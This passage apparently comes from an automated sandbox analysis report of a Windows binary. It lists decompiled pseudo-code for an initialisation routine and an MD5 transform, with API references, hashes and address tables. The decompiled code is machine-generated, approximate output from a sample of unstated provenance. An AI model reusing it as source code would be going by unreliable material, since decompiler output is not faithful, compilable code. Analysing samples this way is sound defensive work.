                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13F0BB7260102857E720B63E9C6CDEB76ACDFC5714F040A61FA09C3000FA74FE4586B1
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E00401146() {
                                                                                                                                                                                                                                                            				void* _t1;
                                                                                                                                                                                                                                                            				long _t3;
                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                            				long _t5;
                                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                                            				intOrPtr _t8;
                                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t8 =  *0x404130;
                                                                                                                                                                                                                                                            				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                            				 *0x40413c = _t1;
                                                                                                                                                                                                                                                            				if(_t1 == 0) {
                                                                                                                                                                                                                                                            					return GetLastError();
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t3 = GetVersion();
                                                                                                                                                                                                                                                            				if(_t3 != 5) {
                                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                                            					if(_t12 <= 0) {
                                                                                                                                                                                                                                                            						_t4 = 0x32;
                                                                                                                                                                                                                                                            						return _t4;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					if(_t3 > 0) {
                                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                                            						 *0x40412c = _t3;
                                                                                                                                                                                                                                                            						_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                                            						 *0x404128 = _t5;
                                                                                                                                                                                                                                                            						 *0x404130 = _t8;
                                                                                                                                                                                                                                                            						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                                            						 *0x404124 = _t6;
                                                                                                                                                                                                                                                            						if(_t6 == 0) {
                                                                                                                                                                                                                                                            							 *0x404124 =  *0x404124 | 0xffffffff;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t12 = _t3 - _t3;
                                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                            0x00401147
                                                                                                                                                                                                                                                            0x00401155
                                                                                                                                                                                                                                                            0x0040115d
                                                                                                                                                                                                                                                            0x00401162
                                                                                                                                                                                                                                                            0x004011b4
                                                                                                                                                                                                                                                            0x004011b4
                                                                                                                                                                                                                                                            0x00401164
                                                                                                                                                                                                                                                            0x0040116c
                                                                                                                                                                                                                                                            0x00401174
                                                                                                                                                                                                                                                            0x00401174
                                                                                                                                                                                                                                                            0x004011b0
                                                                                                                                                                                                                                                            0x004011b2
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040116e
                                                                                                                                                                                                                                                            0x00401170
                                                                                                                                                                                                                                                            0x00401176
                                                                                                                                                                                                                                                            0x00401176
                                                                                                                                                                                                                                                            0x0040117b
                                                                                                                                                                                                                                                            0x00401189
                                                                                                                                                                                                                                                            0x0040118e
                                                                                                                                                                                                                                                            0x00401194
                                                                                                                                                                                                                                                            0x0040119c
                                                                                                                                                                                                                                                            0x004011a1
                                                                                                                                                                                                                                                            0x004011a3
                                                                                                                                                                                                                                                            0x004011a3
                                                                                                                                                                                                                                                            0x004011ad
                                                                                                                                                                                                                                                            0x00401172
                                                                                                                                                                                                                                                            0x00401172
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401172
                                                                                                                                                                                                                                                            0x00401170

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,0040100C), ref: 00401155
                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,0040100C), ref: 00401164
                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,0040100C), ref: 0040117B
                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,0040100C), ref: 00401194
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 845504543-0
                                                                                                                                                                                                                                                            • Opcode ID: aad0916a06db11bbb673eddfe48db502db38db4b3b5c81dd2374932bbcc7b00a
                                                                                                                                                                                                                                                            • Instruction ID: c0012c1876fdcedf7ce613fedff83a95564d5b92f0b8d4125950e8219de939df
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aad0916a06db11bbb673eddfe48db502db38db4b3b5c81dd2374932bbcc7b00a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72F04FB16513109AE7209F68BF09B853FA8A759713F004236E784FE2F8D37445818B4C
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                                            			E0487936B(void* __ecx, intOrPtr* _a4) {
                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                            				void _v76;
                                                                                                                                                                                                                                                            				intOrPtr* _t226;
                                                                                                                                                                                                                                                            				signed int _t229;
                                                                                                                                                                                                                                                            				signed int _t231;
                                                                                                                                                                                                                                                            				signed int _t233;
                                                                                                                                                                                                                                                            				signed int _t235;
                                                                                                                                                                                                                                                            				signed int _t237;
                                                                                                                                                                                                                                                            				signed int _t239;
                                                                                                                                                                                                                                                            				signed int _t241;
                                                                                                                                                                                                                                                            				signed int _t243;
                                                                                                                                                                                                                                                            				signed int _t245;
                                                                                                                                                                                                                                                            				signed int _t247;
                                                                                                                                                                                                                                                            				signed int _t249;
                                                                                                                                                                                                                                                            				signed int _t251;
                                                                                                                                                                                                                                                            				signed int _t253;
                                                                                                                                                                                                                                                            				signed int _t255;
                                                                                                                                                                                                                                                            				signed int _t257;
                                                                                                                                                                                                                                                            				signed int _t259;
                                                                                                                                                                                                                                                            				signed int _t274;
                                                                                                                                                                                                                                                            				signed int _t337;
                                                                                                                                                                                                                                                            				void* _t347;
                                                                                                                                                                                                                                                            				signed int _t348;
                                                                                                                                                                                                                                                            				signed int _t350;
                                                                                                                                                                                                                                                            				signed int _t352;
                                                                                                                                                                                                                                                            				signed int _t354;
                                                                                                                                                                                                                                                            				signed int _t356;
                                                                                                                                                                                                                                                            				signed int _t358;
                                                                                                                                                                                                                                                            				signed int _t360;
                                                                                                                                                                                                                                                            				signed int _t362;
                                                                                                                                                                                                                                                            				signed int _t364;
                                                                                                                                                                                                                                                            				signed int _t366;
                                                                                                                                                                                                                                                            				signed int _t375;
                                                                                                                                                                                                                                                            				signed int _t377;
                                                                                                                                                                                                                                                            				signed int _t379;
                                                                                                                                                                                                                                                            				signed int _t381;
                                                                                                                                                                                                                                                            				signed int _t383;
                                                                                                                                                                                                                                                            				intOrPtr* _t399;
                                                                                                                                                                                                                                                            				signed int _t407;
                                                                                                                                                                                                                                                            				signed int _t409;
                                                                                                                                                                                                                                                            				signed int _t411;
                                                                                                                                                                                                                                                            				signed int _t413;
                                                                                                                                                                                                                                                            				signed int _t415;
                                                                                                                                                                                                                                                            				signed int _t417;
                                                                                                                                                                                                                                                            				signed int _t419;
                                                                                                                                                                                                                                                            				signed int _t421;
                                                                                                                                                                                                                                                            				signed int _t423;
                                                                                                                                                                                                                                                            				signed int _t425;
                                                                                                                                                                                                                                                            				signed int _t427;
                                                                                                                                                                                                                                                            				signed int _t429;
                                                                                                                                                                                                                                                            				signed int _t437;
                                                                                                                                                                                                                                                            				signed int _t439;
                                                                                                                                                                                                                                                            				signed int _t441;
                                                                                                                                                                                                                                                            				signed int _t443;
                                                                                                                                                                                                                                                            				signed int _t445;
                                                                                                                                                                                                                                                            				void* _t447;
                                                                                                                                                                                                                                                            				signed int _t507;
                                                                                                                                                                                                                                                            				signed int _t598;
                                                                                                                                                                                                                                                            				signed int _t606;
                                                                                                                                                                                                                                                            				signed int _t612;
                                                                                                                                                                                                                                                            				signed int _t678;
                                                                                                                                                                                                                                                            				signed int* _t681;
                                                                                                                                                                                                                                                            				signed int _t682;
                                                                                                                                                                                                                                                            				signed int _t684;
                                                                                                                                                                                                                                                            				signed int _t689;
                                                                                                                                                                                                                                                            				signed int _t691;
                                                                                                                                                                                                                                                            				signed int _t696;
                                                                                                                                                                                                                                                            				signed int _t698;
                                                                                                                                                                                                                                                            				signed int _t717;
                                                                                                                                                                                                                                                            				signed int _t719;
                                                                                                                                                                                                                                                            				signed int _t721;
                                                                                                                                                                                                                                                            				signed int _t723;
                                                                                                                                                                                                                                                            				signed int _t725;
                                                                                                                                                                                                                                                            				signed int _t727;
                                                                                                                                                                                                                                                            				signed int _t733;
                                                                                                                                                                                                                                                            				signed int _t739;
                                                                                                                                                                                                                                                            				signed int _t741;
                                                                                                                                                                                                                                                            				signed int _t743;
                                                                                                                                                                                                                                                            				signed int _t745;
                                                                                                                                                                                                                                                            				signed int _t747;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t226 = _a4;
                                                                                                                                                                                                                                                            				_t347 = __ecx + 2;
                                                                                                                                                                                                                                                            				_t681 =  &_v76;
                                                                                                                                                                                                                                                            				_t447 = 0x10;
                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                            					_t274 =  *(_t347 - 1) & 0x000000ff;
                                                                                                                                                                                                                                                            					_t347 = _t347 + 4;
                                                                                                                                                                                                                                                            					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                                                                                                                                                                                                                                                            					_t681 =  &(_t681[1]);
                                                                                                                                                                                                                                                            					_t447 = _t447 - 1;
                                                                                                                                                                                                                                                            				} while (_t447 != 0);
                                                                                                                                                                                                                                                            				_t6 = _t226 + 4; // 0x14eb3fc3
                                                                                                                                                                                                                                                            				_t682 =  *_t6;
                                                                                                                                                                                                                                                            				_t7 = _t226 + 8; // 0x8d08458b
                                                                                                                                                                                                                                                            				_t407 =  *_t7;
                                                                                                                                                                                                                                                            				_t8 = _t226 + 0xc; // 0x56c1184c
                                                                                                                                                                                                                                                            				_t348 =  *_t8;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x7");
                                                                                                                                                                                                                                                            				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                                                                                                                                                                                                                                                            				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                                            				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                                                                                                                                                                                                                                                            				asm("ror edx, 0xf");
                                                                                                                                                                                                                                                            				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                                                                                                                                                                                                                                                            				asm("ror esi, 0xa");
                                                                                                                                                                                                                                                            				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                                                                                                                                                                                                                                                            				_v8 = _t684;
                                                                                                                                                                                                                                                            				_t689 = _v8;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x7");
                                                                                                                                                                                                                                                            				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                                                                                                                                                                                                                                                            				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                                            				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                                                                                                                                                                                                                                                            				asm("ror edx, 0xf");
                                                                                                                                                                                                                                                            				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                                                                                                                                                                                                                                                            				asm("ror esi, 0xa");
                                                                                                                                                                                                                                                            				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                                                                                                                                                                                                                                                            				_v8 = _t691;
                                                                                                                                                                                                                                                            				_t696 = _v8;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x7");
                                                                                                                                                                                                                                                            				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                                                                                                                                                                                                                                                            				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                                            				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                                                                                                                                                                                                                                                            				asm("ror edx, 0xf");
                                                                                                                                                                                                                                                            				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                                                                                                                                                                                                                                                            				asm("ror esi, 0xa");
                                                                                                                                                                                                                                                            				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                                                                                                                                                                                                                                                            				_v8 = _t698;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x7");
                                                                                                                                                                                                                                                            				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                                                                                                                                                                                                                            				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                                            				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                                                                                                                                                                                                                                                            				_t507 =  !_t356;
                                                                                                                                                                                                                                                            				asm("ror edx, 0xf");
                                                                                                                                                                                                                                                            				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                                                                                                                                                                                                                                                            				_v12 = _t415;
                                                                                                                                                                                                                                                            				_v12 =  !_v12;
                                                                                                                                                                                                                                                            				asm("ror esi, 0xa");
                                                                                                                                                                                                                                                            				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x5");
                                                                                                                                                                                                                                                            				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                                                                                                                                                                                                                                                            				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                                            				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                                                                                                                                                                                                                                                            				asm("rol edx, 0xe");
                                                                                                                                                                                                                                                            				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                                                                                                                                                                                                                                                            				asm("ror esi, 0xc");
                                                                                                                                                                                                                                                            				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x5");
                                                                                                                                                                                                                                                            				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                                                                                                                                                                                                                                                            				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                                            				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                                                                                                                                                                                                                                                            				asm("rol edx, 0xe");
                                                                                                                                                                                                                                                            				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                                                                                                                                                                                                                                                            				asm("ror esi, 0xc");
                                                                                                                                                                                                                                                            				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x5");
                                                                                                                                                                                                                                                            				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                                                                                                                                                                                                                                                            				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                                            				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                                                                                                                                                                                                                                                            				asm("rol edx, 0xe");
                                                                                                                                                                                                                                                            				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                                                                                                                                                                                                                                                            				asm("ror esi, 0xc");
                                                                                                                                                                                                                                                            				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x5");
                                                                                                                                                                                                                                                            				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                                                                                                                                                                                                                                                            				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                                            				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                                                                                                                                                                                                                                                            				asm("rol edx, 0xe");
                                                                                                                                                                                                                                                            				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                                                                                                                                                                                                                                                            				asm("ror esi, 0xc");
                                                                                                                                                                                                                                                            				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x4");
                                                                                                                                                                                                                                                            				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                                                                                                                                                                                                                                                            				asm("rol ecx, 0xb");
                                                                                                                                                                                                                                                            				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                                                                                                                                                                                                                                                            				asm("rol edx, 0x10");
                                                                                                                                                                                                                                                            				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                                                                                                                                                                                                                                                            				_t598 = _t366 ^ _t425;
                                                                                                                                                                                                                                                            				asm("ror esi, 0x9");
                                                                                                                                                                                                                                                            				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x4");
                                                                                                                                                                                                                                                            				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                                                                                                                                                                                                                                                            				asm("rol edi, 0xb");
                                                                                                                                                                                                                                                            				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                                                                                                                                                                                                                                                            				asm("rol edx, 0x10");
                                                                                                                                                                                                                                                            				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                                                                                                                                                                                                                                                            				_t337 = _t606 ^ _t427;
                                                                                                                                                                                                                                                            				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                                            				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x4");
                                                                                                                                                                                                                                                            				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                                                                                                                                                                                                                                                            				asm("rol esi, 0xb");
                                                                                                                                                                                                                                                            				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                                                                                                                                                                                                                                                            				asm("rol edi, 0x10");
                                                                                                                                                                                                                                                            				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                                                                                                                                                                                                                                                            				_t429 = _t733 ^ _t612;
                                                                                                                                                                                                                                                            				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                                            				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x4");
                                                                                                                                                                                                                                                            				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                                                                                                                                                                                                                                                            				asm("rol edx, 0xb");
                                                                                                                                                                                                                                                            				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                                                                                                                                                                                                                                                            				asm("rol esi, 0x10");
                                                                                                                                                                                                                                                            				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                                                                                                                                                                                                                                                            				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                                            				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x6");
                                                                                                                                                                                                                                                            				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                                                                                                                                                                                                                                                            				asm("rol edx, 0xa");
                                                                                                                                                                                                                                                            				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                                                                                                                                                                                                                                                            				asm("rol esi, 0xf");
                                                                                                                                                                                                                                                            				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                                                                                                                                                                                                                                                            				asm("ror ecx, 0xb");
                                                                                                                                                                                                                                                            				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x6");
                                                                                                                                                                                                                                                            				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                                                                                                                                                                                                                                                            				asm("rol edx, 0xa");
                                                                                                                                                                                                                                                            				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                                                                                                                                                                                                                                                            				asm("rol esi, 0xf");
                                                                                                                                                                                                                                                            				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                                                                                                                                                                                                                                                            				asm("ror ecx, 0xb");
                                                                                                                                                                                                                                                            				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x6");
                                                                                                                                                                                                                                                            				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                                                                                                                                                                                                                                                            				asm("rol edx, 0xa");
                                                                                                                                                                                                                                                            				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                                                                                                                                                                                                                                                            				asm("rol esi, 0xf");
                                                                                                                                                                                                                                                            				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                                                                                                                                                                                                                                                            				asm("ror edi, 0xb");
                                                                                                                                                                                                                                                            				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                                                                                                                                                                                                                                                            				asm("rol eax, 0x6");
                                                                                                                                                                                                                                                            				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                                                                                                                                                                                                                                                            				asm("rol edx, 0xa");
                                                                                                                                                                                                                                                            				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                                                                                                                                                                                                                                                            				_t399 = _a4;
                                                                                                                                                                                                                                                            				asm("rol esi, 0xf");
                                                                                                                                                                                                                                                            				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                                                                                                                                                                                                                                                            				 *_t399 =  *_t399 + _t259;
                                                                                                                                                                                                                                                            				asm("ror eax, 0xb");
                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                                                                                                                                                                                                                                                            				return memset( &_v76, 0, 0x40);
                                                                                                                                                                                                                                                            			}



































































































                                                                                                                                                                                                                                                            0x0487936e
                                                                                                                                                                                                                                                            0x04879379
                                                                                                                                                                                                                                                            0x0487937c
                                                                                                                                                                                                                                                            0x0487937f
                                                                                                                                                                                                                                                            0x04879380
                                                                                                                                                                                                                                                            0x04879380
                                                                                                                                                                                                                                                            0x0487938b
                                                                                                                                                                                                                                                            0x0487939c
                                                                                                                                                                                                                                                            0x0487939e
                                                                                                                                                                                                                                                            0x048793a1
                                                                                                                                                                                                                                                            0x048793a1
                                                                                                                                                                                                                                                            0x048793a4
                                                                                                                                                                                                                                                            0x048793a4
                                                                                                                                                                                                                                                            0x048793a7
                                                                                                                                                                                                                                                            0x048793a7
                                                                                                                                                                                                                                                            0x048793aa
                                                                                                                                                                                                                                                            0x048793aa
                                                                                                                                                                                                                                                            0x048793c7
                                                                                                                                                                                                                                                            0x048793ca
                                                                                                                                                                                                                                                            0x048793e0
                                                                                                                                                                                                                                                            0x048793e3
                                                                                                                                                                                                                                                            0x048793fd
                                                                                                                                                                                                                                                            0x04879400
                                                                                                                                                                                                                                                            0x04879416
                                                                                                                                                                                                                                                            0x04879419
                                                                                                                                                                                                                                                            0x0487941b
                                                                                                                                                                                                                                                            0x04879433
                                                                                                                                                                                                                                                            0x04879436
                                                                                                                                                                                                                                                            0x04879439
                                                                                                                                                                                                                                                            0x04879451
                                                                                                                                                                                                                                                            0x04879454
                                                                                                                                                                                                                                                            0x0487946e
                                                                                                                                                                                                                                                            0x04879471
                                                                                                                                                                                                                                                            0x04879487
                                                                                                                                                                                                                                                            0x0487948a
                                                                                                                                                                                                                                                            0x0487948c
                                                                                                                                                                                                                                                            0x048794a4
                                                                                                                                                                                                                                                            0x048794a9
                                                                                                                                                                                                                                                            0x048794ac
                                                                                                                                                                                                                                                            0x048794c2
                                                                                                                                                                                                                                                            0x048794c5
                                                                                                                                                                                                                                                            0x048794df
                                                                                                                                                                                                                                                            0x048794e2
                                                                                                                                                                                                                                                            0x048794f8
                                                                                                                                                                                                                                                            0x048794fb
                                                                                                                                                                                                                                                            0x048794fd
                                                                                                                                                                                                                                                            0x04879518
                                                                                                                                                                                                                                                            0x0487951b
                                                                                                                                                                                                                                                            0x04879532
                                                                                                                                                                                                                                                            0x04879535
                                                                                                                                                                                                                                                            0x04879539
                                                                                                                                                                                                                                                            0x04879552
                                                                                                                                                                                                                                                            0x04879555
                                                                                                                                                                                                                                                            0x04879557
                                                                                                                                                                                                                                                            0x0487955a
                                                                                                                                                                                                                                                            0x04879575
                                                                                                                                                                                                                                                            0x04879578
                                                                                                                                                                                                                                                            0x04879591
                                                                                                                                                                                                                                                            0x04879594
                                                                                                                                                                                                                                                            0x048795a4
                                                                                                                                                                                                                                                            0x048795a7
                                                                                                                                                                                                                                                            0x048795bf
                                                                                                                                                                                                                                                            0x048795c2
                                                                                                                                                                                                                                                            0x048795dc
                                                                                                                                                                                                                                                            0x048795df
                                                                                                                                                                                                                                                            0x048795f7
                                                                                                                                                                                                                                                            0x048795fa
                                                                                                                                                                                                                                                            0x04879610
                                                                                                                                                                                                                                                            0x04879613
                                                                                                                                                                                                                                                            0x0487962b
                                                                                                                                                                                                                                                            0x0487962e
                                                                                                                                                                                                                                                            0x04879646
                                                                                                                                                                                                                                                            0x04879649
                                                                                                                                                                                                                                                            0x04879663
                                                                                                                                                                                                                                                            0x04879666
                                                                                                                                                                                                                                                            0x0487967c
                                                                                                                                                                                                                                                            0x0487967f
                                                                                                                                                                                                                                                            0x04879697
                                                                                                                                                                                                                                                            0x0487969a
                                                                                                                                                                                                                                                            0x048796b4
                                                                                                                                                                                                                                                            0x048796b7
                                                                                                                                                                                                                                                            0x048796cf
                                                                                                                                                                                                                                                            0x048796d2
                                                                                                                                                                                                                                                            0x048796e8
                                                                                                                                                                                                                                                            0x048796eb
                                                                                                                                                                                                                                                            0x04879703
                                                                                                                                                                                                                                                            0x04879706
                                                                                                                                                                                                                                                            0x0487971e
                                                                                                                                                                                                                                                            0x04879721
                                                                                                                                                                                                                                                            0x04879733
                                                                                                                                                                                                                                                            0x04879736
                                                                                                                                                                                                                                                            0x04879748
